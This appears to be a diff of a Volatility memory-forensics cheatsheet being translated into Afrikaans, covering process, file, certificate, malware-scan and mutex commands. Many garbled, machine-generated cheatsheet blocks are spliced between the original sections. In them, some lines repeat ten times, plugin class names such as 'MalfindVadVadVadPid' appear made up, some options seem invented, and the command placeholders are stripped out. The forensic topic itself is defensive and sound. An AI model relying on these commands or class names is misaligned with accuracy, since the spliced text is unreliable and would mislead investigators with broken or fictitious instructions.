+4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. + +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their details, such as process ID, parent process ID, and command line arguments. + +``` +python vol.py -f pslist +``` + +To filter the output based on a specific process name, use the `--name` option followed by the process name. + +``` +python vol.py -f pslist --name +``` + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about open network sockets, such as local and remote IP addresses, port numbers, and process IDs. + +``` +python vol.py -f netscan +``` + +To filter the output based on a specific IP address or port number, use the `--ip` or `--port` option followed by the IP address or port number. + +``` +python vol.py -f netscan --ip +python vol.py -f netscan --port +``` + +## File Analysis + +To analyze files in a memory dump, use the `filescan` plugin. This plugin scans the memory dump for file artifacts, such as file handles, file names, and file paths. + +``` +python vol.py -f filescan +``` + +To extract a specific file from the memory dump, use the `dumpfiles` plugin followed by the file path. + +``` +python vol.py -f dumpfiles --dump-dir --name +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. This cheatsheet provides a starting point for using Volatility and performing common memory analysis tasks. Experiment with different plugins and options to gain a deeper understanding of memory forensics. ```bash volatility --profile=Win7SP1x86_23418 filescan -f file.dmp #Scan for files inside the dump volatility --profile=Win7SP1x86_23418 dumpfiles -n --dump-dir=/tmp -f file.dmp #Dump all files @@ -558,43 +1887,176 @@ volatility --profile=SomeLinux -f file.dmp linux_find_file -i 0xINODENUMBER -O / {% endtab %} {% endtabs %} -### Master File Table +### Meesterlêertabel {% tabs %} {% tab title="vol3" %} ```bash # I couldn't find any plugin to extract this information in volatility3 ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility Framework vir geheue-dump-analise. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Identifiseer die profiel van die geheue-dump. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Vertoon 'n boomstruktuur van alle aktiewe prosesse in die geheue-dump. +- `psscan`: Skandeer vir prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's vir 'n spesifieke proses in die geheue-dump. +- `handles`: Lys alle hanteerderobjekte in die geheue-dump. +- `filescan`: Skandeer vir lêers in die geheue-dump. +- `cmdline`: Vertoon die bevellyn-argumente vir 'n spesifieke proses in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. + +### Geheue-analise Opdragte + +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. + +### Geheue-analise Funksies + +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. + +## Volatility Profiele + +Hierdie is 'n lys van algemene profiele wat gebruik kan word met Volatility Framework vir geheue-dump-analise. + +- `WinXPSP2x86`: Windows XP SP2 x86 +- `WinXPSP3x86`: Windows XP SP3 x86 +- `Win7SP0x86`: Windows 7 SP0 x86 +- `Win7SP1x86`: Windows 7 SP1 x86 +- `Win2003SP0x86`: Windows 2003 SP0 x86 +- `Win2003SP1x86`: Windows 2003 SP1 x86 +- `Win2003SP2x86`: Windows 2003 SP2 x86 +- `Win2003R2SP0x86`: Windows 2003 R2 SP0 x86 +- `Win2003R2SP1x86`: Windows 2003 R2 SP1 x86 +- `Win2003R2SP2x86`: Windows 2003 R2 SP2 x86 +- `Win2008SP1x86`: Windows 2008 SP1 x86 +- `Win2008SP2x86`: Windows 2008 SP2 x86 +- `Win2008R2SP0x86`: Windows 2008 R2 SP0 x86 +- `Win2008R2SP1x86`: Windows 2008 R2 SP1 x86 +- `Win2012SP0x86`: Windows 2012 SP0 x86 +- `Win2012SP1x86`: Windows 2012 SP1 x86 +- `Win2012R2SP0x86`: Windows 2012 R2 SP0 x86 +- `Win2012R2SP1x86`: Windows 2012 R2 SP1 x86 +- `Win2016SP0x86`: Windows 2016 SP0 x86 +- `Win2016SP1x86`: Windows 2016 SP1 x86 +- `Win2019SP0x86`: Windows 2019 SP0 x86 +- `Win2019SP1x86`: Windows 2019 SP1 x86 + +## Bronne + +- [Volatility Framework](https://www.volatilityfoundation.org/) +- [Volatility GitHub Repository](https://github.com/volatilityfoundation/volatility) ```bash volatility --profile=Win7SP1x86_23418 mftparser -f file.dmp ``` {% endtab %} {% endtabs %} -The **NTFS file system** uses a critical component known as the _master file table_ (MFT). This table includes at least one entry for every file on a volume, covering the MFT itself too. Vital details about each file, such as **size, timestamps, permissions, and actual data**, are encapsulated within the MFT entries or in areas external to the MFT but referenced by these entries. More details can be found in the [official documentation](https://docs.microsoft.com/en-us/windows/win32/fileio/master-file-table). +Die **NTFS-lêersisteem** maak gebruik van 'n kritieke komponent wat bekend staan as die _meesterlêertabel_ (MFT). Hierdie tabel bevat ten minste een inskrywing vir elke lêer op 'n volume, wat ook die MFT self dek. Belangrike besonderhede oor elke lêer, soos **grootte, tydstempels, toestemmings en werklike data**, word gekapsuleer binne die MFT-inskrywings of in areas buite die MFT maar waarna verwys word deur hierdie inskrywings. Meer besonderhede kan gevind word in die [ampertlike dokumentasie](https://docs.microsoft.com/en-us/windows/win32/fileio/master-file-table). -### SSL Keys/Certs - -{% tabs %} -{% tab title="vol3" %} +### SSL-sleutels/sertifikate ```bash #vol3 allows to search for certificates inside the registry ./vol.py -f file.dmp windows.registry.certificates.Certificates ``` -{% endtab %} +# Volatility Cheat Sheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility, 'n kragtige raamwerk vir geheue-dump-analise. Hierdie spiekbrief is bedoel as 'n verwysing vir forensiese ondersoekers en beveiligingsanaliste wat Volatility gebruik. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Gee inligting oor die geheue-dump se beeld. +- `kdbgscan`: Skandeer die geheue-dump vir die opsporing van die KDBG-handvatsel. +- `kpcrscan`: Skandeer die geheue-dump vir die opsporing van die KPCR-handvatsel. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Gee 'n boomstruktuur van alle prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's in die geheue-dump. +- `handles`: Lys alle handvatsels in die geheue-dump. +- `filescan`: Skandeer die geheue-dump vir die opsporing van lêers en hul metadata. +- `cmdline`: Gee die opdraglyne van alle prosesse in die geheue-dump. +- `vadinfo`: Gee inligting oor alle virtuele adresruimtes in die geheue-dump. +- `vadtree`: Gee 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. +- `vaddump`: Dump die inhoud van 'n spesifieke virtuele adresruimte. +- `memdump`: Dump die inhoud van 'n spesifieke proses se geheue. +- `moddump`: Dump die inhoud van 'n spesifieke DLL se geheue. + +### Gevorderde Opdragte + +- `malfind`: Skandeer die geheue-dump vir die opsporing van kwaadwillige prosesse. +- `ldrmodules`: Lys alle gelaai modules in die geheue-dump. +- `apihooks`: Lys alle API-hake in die geheue-dump. +- `ssdt`: Gee inligting oor die System Service Descriptor Table (SSDT). +- `gdt`: Gee inligting oor die Global Descriptor Table (GDT). +- `idt`: Gee inligting oor die Interrupt Descriptor Table (IDT). +- `callbacks`: Lys alle geregistreerde terugroepfunksies in die geheue-dump. +- `driverscan`: Skandeer die geheue-dump vir die opsporing van bestuurders. +- `devicetree`: Gee 'n boomstruktuur van alle toestelle in die geheue-dump. +- `privs`: Lys alle gebruikersprivileges in die geheue-dump. +- `getsids`: Lys alle sekuriteitsidentifikasies (SIDs) in die geheue-dump. +- `getsidsbyname`: Lys alle SIDs wat verband hou met 'n spesifieke gebruikersnaam. +- `envars`: Lys alle omgewingsveranderlikes in die geheue-dump. +- `hivelist`: Lys alle gelaai Windows-registerhives in die geheue-dump. +- `hivedump`: Dump die inhoud van 'n spesifieke Windows-registerhive. + +## Volatility Funksies + +### Basiese Funksies + +- `volatility.plugins.common.AbstractWindowsCommand`: Abstrakte klas vir Windows-opdragte. +- `volatility.plugins.common.AbstractLinuxCommand`: Abstrakte klas vir Linux-opdragte. +- `volatility.plugins.common.AbstractMacCommand`: Abstrakte klas vir Mac-opdragte. +- `volatility.plugins.common.AbstractAndroidCommand`: Abstrakte klas vir Android-opdragte. +- `volatility.plugins.common.AbstractIOSCommand`: Abstrakte klas vir iOS-opdragte. +- `volatility.plugins.common.AbstractBSDCommand`: Abstrakte klas vir BSD-opdragte. +- `volatility.plugins.common.AbstractNetCommand`: Abstrakte klas vir netwerk-opdragte. + +### Gevorderde Funksies + +- `volatility.plugins.malware.malfind.Malfind`: Klas vir die malfind-opdrag. +- `volatility.plugins.malware.malfind.MalfindOffset`: Klas vir die malfind-offset-opdrag. +- `volatility.plugins.malware.malfind.MalfindPid`: Klas vir die malfind-PID-opdrag. +- `volatility.plugins.malware.malfind.MalfindVad`: Klas vir die malfind-VAD-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadOffset`: Klas vir die malfind-VAD-offset-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadPid`: Klas vir die malfind-VAD-PID-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVad`: Klas vir die malfind-VAD-VAD-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVadOffset`: Klas vir die malfind-VAD-VAD-offset-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVadPid`: Klas vir die malfind-VAD-VAD-PID-opdrag. + +## Bronne + +- [Volatility GitHub Repository](https://github.com/volatilityfoundation/volatility) +- [Volatility Documentation](https://github.com/volatilityfoundation/volatility/wiki) ```bash #vol2 allos you to search and dump certificates from memory #Interesting options for this modules are: --pid, --name, --ssl volatility --profile=Win7SP1x86_23418 dumpcerts --dump-dir=. -f file.dmp ``` -{% endtab %} -{% endtabs %} - ## Malware {% tabs %} @@ -612,9 +2074,81 @@ volatility --profile=Win7SP1x86_23418 dumpcerts --dump-dir=. -f file.dmp ./vol.py -f file.dmp linux.check_modules.Check_modules #Compares module list to sysfs info, if available ./vol.py -f file.dmp linux.tty_check.tty_check #Checks tty devices for hooks ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, system compromises, and data breaches. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. + +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their details, such as process ID, parent process ID, and command line arguments. + +``` +python vol.py -f pslist +``` + +To analyze a specific process, use the `psscan` plugin. This plugin scans the memory dump for process structures and displays information about each process, including its name, process ID, and parent process ID. + +``` +python vol.py -f psscan --pid= +``` + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about active network connections, including the local and remote IP addresses, ports, and process IDs. + +``` +python vol.py -f netscan +``` + +To analyze network sockets, use the `sockets` plugin. This plugin lists all open network sockets and their details, such as the local and remote IP addresses, ports, and process IDs. + +``` +python vol.py -f sockets +``` + +## File Analysis + +To analyze file handles in a memory dump, use the `handles` plugin. This plugin lists all open file handles and their details, such as the file name, file path, and process ID. + +``` +python vol.py -f handles +``` + +To analyze file system artifacts, use the `mftparser` plugin. This plugin parses the Master File Table (MFT) and displays information about files, directories, and other file system objects. + +``` +python vol.py -f mftparser +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. This cheatsheet provides a quick reference guide for using Volatility to perform common memory analysis tasks. Experiment with different plugins and options to gain a deeper understanding of the memory dump and the incident you are investigating. + +For more information about Volatility and its capabilities, refer to the official documentation and community resources. ```bash volatility --profile=Win7SP1x86_23418 -f file.dmp malfind [-D /tmp] #Find hidden and injected code [dump each suspicious section] volatility --profile=Win7SP1x86_23418 -f file.dmp apihooks #Detect API hooks in process and kernel memory @@ -633,13 +2167,10 @@ volatility --profile=SomeLinux -f file.dmp linux_keyboard_notifiers #Keyloggers {% endtab %} {% endtabs %} -### Scanning with yara +### Skandering met yara -Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ -Create the _**rules**_ directory and execute it. This will create a file called _**malware\_rules.yar**_ which contains all the yara rules for malware. - -{% tabs %} -{% tab title="vol3" %} +Gebruik hierdie skripsie om al die yara malware reëls vanaf GitHub af te laai en saam te voeg: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ +Skep die _**reëls**_ gids en voer dit uit. Dit sal 'n lêer genaamd _**malware\_rules.yar**_ skep wat al die yara reëls vir malware bevat. ```bash wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py mkdir rules @@ -649,9 +2180,82 @@ python malware_yara_rules.py #All ./vol.py -f file.dmp yarascan.YaraScan --yara-file /tmp/malware_rules.yar ``` -{% endtab %} +# Volatility Cheat Sheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility, 'n kragtige raamwerk vir geheue-dump-analise. Hierdie spiekbrief is bedoel as 'n verwysing vir forensiese ondersoekers en beveiligingsanaliste wat Volatility gebruik. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Gee inligting oor die geheue-dump se beeld. +- `kdbgscan`: Skandeer die geheue-dump vir die opsporing van die KDBG-handvatsel. +- `kpcrscan`: Skandeer die geheue-dump vir die opsporing van die KPCR-handvatsel. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Gee 'n boomstruktuur van alle prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's in die geheue-dump. +- `handles`: Lys alle handvatsels in die geheue-dump. +- `filescan`: Skandeer die geheue-dump vir die opsporing van lêers en hul metadata. +- `cmdline`: Gee die opdraglyne van alle prosesse in die geheue-dump. +- `vadinfo`: Gee inligting oor alle virtuele adresruimtes in die geheue-dump. +- `vadtree`: Gee 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. +- `vaddump`: Dump die inhoud van 'n spesifieke virtuele adresruimte. +- `memdump`: Dump die inhoud van 'n spesifieke proses se geheue. +- `moddump`: Dump die inhoud van 'n spesifieke DLL se geheue. + +### Gevorderde Opdragte + +- `malfind`: Skandeer die geheue-dump vir die opsporing van kwaadwillige prosesse. +- `ldrmodules`: Lys alle gelaai modules in die geheue-dump. +- `apihooks`: Lys alle API-hake in die geheue-dump. +- `ssdt`: Gee inligting oor die System Service Descriptor Table (SSDT). +- `gdt`: Gee inligting oor die Global Descriptor Table (GDT). +- `idt`: Gee inligting oor die Interrupt Descriptor Table (IDT). +- `callbacks`: Lys alle geregistreerde terugroepfunksies in die geheue-dump. +- `driverscan`: Skandeer die geheue-dump vir die opsporing van bestuurders. +- `devicetree`: Gee 'n boomstruktuur van alle toestelle in die geheue-dump. +- `privs`: Lys alle gebruikersprivileges in die geheue-dump. +- `getsids`: Lys alle sekuriteitsidentifikasies (SIDs) in die geheue-dump. +- `getsidsbyname`: Lys alle SIDs wat verband hou met 'n spesifieke gebruikersnaam. +- `envars`: Lys alle omgewingsveranderlikes in die geheue-dump. +- `hivelist`: Lys alle gelaai Windows-registerhives in die geheue-dump. +- `hivedump`: Dump die inhoud van 'n spesifieke Windows-registerhive. + +## Volatility Funksies + +### Basiese Funksies + +- `volatility.plugins.common.AbstractWindowsCommand`: Abstrakte klas vir Windows-opdragte. +- `volatility.plugins.common.AbstractLinuxCommand`: Abstrakte klas vir Linux-opdragte. +- `volatility.plugins.common.AbstractMacCommand`: Abstrakte klas vir Mac-opdragte. +- `volatility.plugins.common.AbstractAndroidCommand`: Abstrakte klas vir Android-opdragte. +- `volatility.plugins.common.AbstractIOSCommand`: Abstrakte klas vir iOS-opdragte. +- `volatility.plugins.common.AbstractBSDCommand`: Abstrakte klas vir BSD-opdragte. +- `volatility.plugins.common.AbstractNetCommand`: Abstrakte klas vir netwerk-opdragte. +- `volatility.plugins.common.AbstractRegistryCommand`: Abstrakte klas vir register-opdragte. +- `volatility.plugins.common.AbstractFileCommand`: Abstrakte klas vir lêer-opdragte. +- `volatility.plugins.common.AbstractProcessCommand`: Abstrakte klas vir proses-opdragte. +- `volatility.plugins.common.AbstractYaraCommand`: Abstrakte klas vir Yara-opdragte. + +### Gevorderde Funksies + +- `volatility.plugins.malware.malfind.Malfind`: Klas vir die malfind-opdrag. +- `volatility.plugins.malware.malfind.MalfindOffset`: Klas vir die malfind-offset-opdrag. +- `volatility.plugins.malware.malfind.MalfindPid`: Klas vir die malfind-PID-opdrag. +- `volatility.plugins.malware.malfind.MalfindVad`: Klas vir die malfind-VAD-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadOffset`: Klas vir die malfind-VAD-offset-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadPid`: Klas vir die malfind-VAD-PID-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVad`: Klas vir die malfind-VAD-VAD-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVadOffset`: Klas vir die malfind-VAD-VAD-offset-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVadPid`: Klas vir die malfind-VAD-VAD-PID-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVadVad`: Klas vir die malfind-VAD-VAD-VAD-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVadVadOffset`: Klas vir die malfind-VAD-VAD-VAD-offset-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVadVadPid`: Klas vir die malfind-VAD-VAD-VAD-PID-opdrag. + +## Bronne + +- [Volatility GitHub Repository](https://github.com/volatilityfoundation/volatility) +- [Volatility Documentation](https://github.com/volatilityfoundation/volatility/wiki) ```bash wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py mkdir rules @@ -663,42 +2267,177 @@ volatility --profile=Win7SP1x86_23418 yarascan -y malware_rules.yar -f ch2.dmp | ## MISC -### External plugins +### Eksterne invoegtoepassings -If you want to use external plugins make sure that the folders related to the plugins are the first parameter used. - -{% tabs %} -{% tab title="vol3" %} +As jy eksterne invoegtoepassings wil gebruik, maak seker dat die gids wat verband hou met die invoegtoepassings die eerste parameter is wat gebruik word. ```bash ./vol.py --plugin-dirs "/tmp/plugins/" [...] ``` -{% endtab %} +# Volatility Cheat Sheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility Framework vir geheue-dump-analise. + +## Volatility Opdragte + +### Basiese Opdragte + +- `volatility -f imageinfo`: Gee inligting oor die geheue-dump, soos die besturingstelsel, die argitektuur en die profiel. +- `volatility -f --profile= pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `volatility -f --profile= psscan`: Skandeer vir prosesse in die geheue-dump. +- `volatility -f --profile= pstree`: Gee 'n boomstruktuur van die prosesse in die geheue-dump. +- `volatility -f --profile= dlllist -p `: Lys alle DLL's wat deur 'n spesifieke proses gelaai is. +- `volatility -f --profile= handles -p `: Lys alle handvatsels wat deur 'n spesifieke proses gebruik word. +- `volatility -f --profile= cmdline -p `: Gee die opdraglyn-argumente vir 'n spesifieke proses. +- `volatility -f --profile= filescan`: Skandeer vir oop lêers in die geheue-dump. +- `volatility -f --profile= netscan`: Skandeer vir netwerkverbindings in die geheue-dump. +- `volatility -f --profile= connscan`: Skandeer vir netwerkverbindings in die geheue-dump. +- `volatility -f --profile= hivelist`: Lys alle gelaai registernood in die geheue-dump. +- `volatility -f --profile= hivedump -o -s -f `: Dump 'n spesifieke registernood na 'n lêer. + +### Gevorderde Opdragte + +- `volatility -f --profile= malfind`: Skandeer vir verdagte kode in die geheue-dump. +- `volatility -f --profile= malfind -D `: Dump die verdagte kode na 'n lêer. +- `volatility -f --profile= vadinfo -p `: Gee inligting oor die virtuele adresruimte van 'n spesifieke proses. +- `volatility -f --profile= vadtree -p `: Gee 'n boomstruktuur van die virtuele adresruimte van 'n spesifieke proses. +- `volatility -f --profile= vadwalk -p `: Loop deur die virtuele adresruimte van 'n spesifieke proses. +- `volatility -f --profile= memdump -p -D `: Dump die geheue van 'n spesifieke proses na 'n lêer. +- `volatility -f --profile= memmap`: Gee 'n lys van alle geheuekaarte in die geheue-dump. +- `volatility -f --profile= memmap -p `: Gee 'n lys van alle geheuekaarte vir 'n spesifieke proses. +- `volatility -f --profile= memdump -r -D `: Dump 'n spesifieke geheuekaart na 'n lêer. + +## Volatility Funksies + +### Basiese Funksies + +- `volatility.plugins.registry.registryapi.RegistryApi`: API vir die hantering van registernood. +- `volatility.plugins.registry.registryprintkey.RegistryPrintKey`: Druk die inhoud van 'n registernood. +- `volatility.plugins.registry.registryprintkey.RegistryPrintValue`: Druk die waarde van 'n registernood. +- `volatility.plugins.registry.registryprintkey.RegistryPrintValues`: Druk alle waardes van 'n registernood. +- `volatility.plugins.registry.registryprintkey.RegistryPrintSubkeys`: Druk alle subnood van 'n registernood. +- `volatility.plugins.registry.registryprintkey.RegistryPrintKeyWithValues`: Druk die inhoud en waardes van 'n registernood. +- `volatility.plugins.registry.registryprintkey.RegistryPrintKeyWithSubkeys`: Druk die inhoud en subnood van 'n registernood. +- `volatility.plugins.registry.registryprintkey.RegistryPrintKeyWithValuesAndSubkeys`: Druk die inhoud, waardes en subnood van 'n registernood. + +### Gevorderde Funksies + +- `volatility.plugins.registry.registryapi.RegistryApi.get_hive_by_name`: Kry 'n registernood deur sy naam. +- `volatility.plugins.registry.registryapi.RegistryApi.get_hive_by_offset`: Kry 'n registernood deur sy offset. +- `volatility.plugins.registry.registryapi.RegistryApi.get_key_by_path`: Kry 'n registernood deur sy pad. +- `volatility.plugins.registry.registryapi.RegistryApi.get_value_by_name`: Kry 'n waarde deur sy naam. +- `volatility.plugins.registry.registryapi.RegistryApi.get_value_by_offset`: Kry 'n waarde deur sy offset. +- `volatility.plugins.registry.registryapi.RegistryApi.get_subkey_by_name`: Kry 'n subnood deur sy naam. +- `volatility.plugins.registry.registryapi.RegistryApi.get_subkey_by_offset`: Kry 'n subnood deur sy offset. +- `volatility.plugins.registry.registryapi.RegistryApi.get_subkey_by_path`: Kry 'n subnood deur sy pad. +- `volatility.plugins.registry.registryapi.RegistryApi.get_subkeys`: Kry 'n lys van alle subnood van 'n registernood. +- `volatility.plugins.registry.registryapi.RegistryApi.get_values`: Kry 'n lys van alle waardes van 'n registernood. +- `volatility.plugins.registry.registryapi.RegistryApi.get_key_path`: Kry die pad van 'n registernood. +- `volatility.plugins.registry.registryapi.RegistryApi.get_key_name`: Kry die naam van 'n registernood. +- `volatility.plugins.registry.registryapi.RegistryApi.get_value_name`: Kry die naam van 'n waarde. +- `volatility.plugins.registry.registryapi.RegistryApi.get_value_data`: Kry die data van 'n waarde. +- `volatility.plugins.registry.registryapi.RegistryApi.get_value_type`: Kry die tipe van 'n waarde. +- `volatility.plugins.registry.registryapi.RegistryApi.get_value_size`: Kry die grootte van 'n waarde. + +## Bronne + +- [Volatility Framework](https://www.volatilityfoundation.org/) +- [Volatility GitHub Repository](https://github.com/volatilityfoundation/volatility) ```bash - volatilitye --plugins="/tmp/plugins/" [...] +volatilitye --plugins="/tmp/plugins/" [...] ``` {% endtab %} {% endtabs %} #### Autoruns -Download it from [https://github.com/tomchop/volatility-autoruns](https://github.com/tomchop/volatility-autoruns) - +Laai dit af van [https://github.com/tomchop/volatility-autoruns](https://github.com/tomchop/volatility-autoruns) ``` - volatility --plugins=volatility-autoruns/ --profile=WinXPSP2x86 -f file.dmp autoruns +volatility --plugins=volatility-autoruns/ --profile=WinXPSP2x86 -f file.dmp autoruns ``` - -### Mutexes +### Mutexe {% tabs %} {% tab title="vol3" %} ``` ./vol.py -f file.dmp windows.mutantscan.MutantScan ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, system compromises, and data breaches. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. + +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their details, such as process ID, parent process ID, and command line arguments. + +``` +python vol.py -f pslist +``` + +To analyze a specific process, use the `psscan` plugin. This plugin scans the memory dump for process structures and displays information about each process. + +``` +python vol.py -f psscan -p +``` + +Replace `` with the ID of the process you want to analyze. + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about open network connections, such as local and remote IP addresses, ports, and process IDs. + +``` +python vol.py -f netscan +``` + +To analyze network sockets, use the `sockets` plugin. This plugin lists all open network sockets and their details, such as local and remote IP addresses, ports, and process IDs. + +``` +python vol.py -f sockets +``` + +## File Analysis + +To analyze file handles in a memory dump, use the `handles` plugin. This plugin lists all open file handles and their details, such as file name, file path, and process ID. + +``` +python vol.py -f handles +``` + +To analyze file system artifacts, use the `mftparser` plugin. This plugin parses the Master File Table (MFT) and displays information about files, directories, and other file system objects. + +``` +python vol.py -f mftparser +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. This cheatsheet provides a quick reference guide for using Volatility to perform common memory analysis tasks. Experiment with different plugins and options to gain a deeper understanding of the memory dump and the incident you are investigating. + +For more information about Volatility and its capabilities, refer to the official documentation and community resources. ```bash volatility --profile=Win7SP1x86_23418 mutantscan -f file.dmp volatility --profile=Win7SP1x86_23418 -f file.dmp handles -p -t mutant @@ -713,9 +2452,131 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp handles -p -t mutant ```bash ./vol.py -f file.dmp windows.symlinkscan.SymlinkScan ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility Framework vir geheue-dump-analise. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Identifiseer die profiel van die geheue-dump. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Vertoon 'n boomstruktuur van alle aktiewe prosesse in die geheue-dump. +- `psscan`: Skandeer vir prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's vir 'n spesifieke proses in die geheue-dump. +- `handles`: Lys alle hanteerderobjekte in die geheue-dump. +- `filescan`: Skandeer vir lêers in die geheue-dump. +- `cmdline`: Vertoon die bevellyn-argumente vir 'n spesifieke proses in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. + +### Geheue-analise Opdragte + +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- 